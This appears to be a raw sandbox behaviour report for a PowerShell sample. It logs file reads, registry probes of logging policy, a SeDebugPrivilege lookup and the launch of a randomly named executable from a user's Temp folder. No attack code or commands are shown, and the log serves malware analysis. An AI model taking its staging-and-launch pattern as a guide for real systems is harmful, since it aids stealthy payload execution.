Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MMAgent type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MsDtc type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\MSMQ type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetAdapter type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetConnection type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetLbfo type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetNat type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetQos type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSecurity type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PKI type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PnpDevice type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PrintManagement type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Provisioning type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SecureBoot type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbShare type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\SmbWitness type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\StartLayout type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Storage type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TLS type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\UEV type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\VpnClient type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Wdac type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate type = file_attributes True 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 type = file_attributes True 2
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 type = file_attributes True 7
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 type = file_type True 4
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1 type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1 type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management type = file_attributes False 1
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management type = file_attributes False 1
Fn
Get Info C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll type = file_attributes False 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe type = file_attributes True 3
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config type = size, size_out = 0 True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 4096, size_out = 4096 True 12
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 3, size_out = 3 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 9, size_out = 9 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 44, size_out = 44 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 12, size_out = 12 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 4, size_out = 4 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 7, size_out = 7 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 22, size_out = 22 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 19, size_out = 19 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 2, size_out = 2 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 24, size_out = 24 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 11, size_out = 11 True 1
Fn
Data
Read C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache size = 4096, size_out = 3715 True 1
Fn
Data
Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 size = 4096, size_out = 2538 True 1
Fn
Data
Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 size = 534, size_out = 0 True 1
Fn
Read C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 4096 True 8
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 3215 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Write C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_35syrs1n.w3d.ps1 size = 1 True 1
Fn
Data
Write C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_cygv5j12.bxt.psm1 size = 1 True 1
Fn
Data
Delete C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_35syrs1n.w3d.ps1 - True 1
Fn
Delete C:\Users\FD1HVy\AppData\Local\Temp\__PSScriptPolicyTest_cygv5j12.bxt.psm1 - True 1
Fn
Registry (190)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2} - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine - True 5
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN value_name = ServiceStackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\WSMAN value_name = ServiceStackVersion, data = 3.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = TZI, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = __PSLockdownPolicy, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 5
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 5
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\FD1HVy\AppData\Local\Temp\PHfW.exe show_window = SW_SHOWNORMAL True 1
Fn
Module (7)
»
Operation Module Additional Information Success Count Logfile
Load C:\WINDOWS\system32\en-US\tzres.dll.mui base_address = 0x194c7530001 True 3
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (260)
»
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 246
Fn
Sleep duration = -1 (infinite) True 1
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 2
Fn
Sleep duration = -1 (infinite) True 2
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
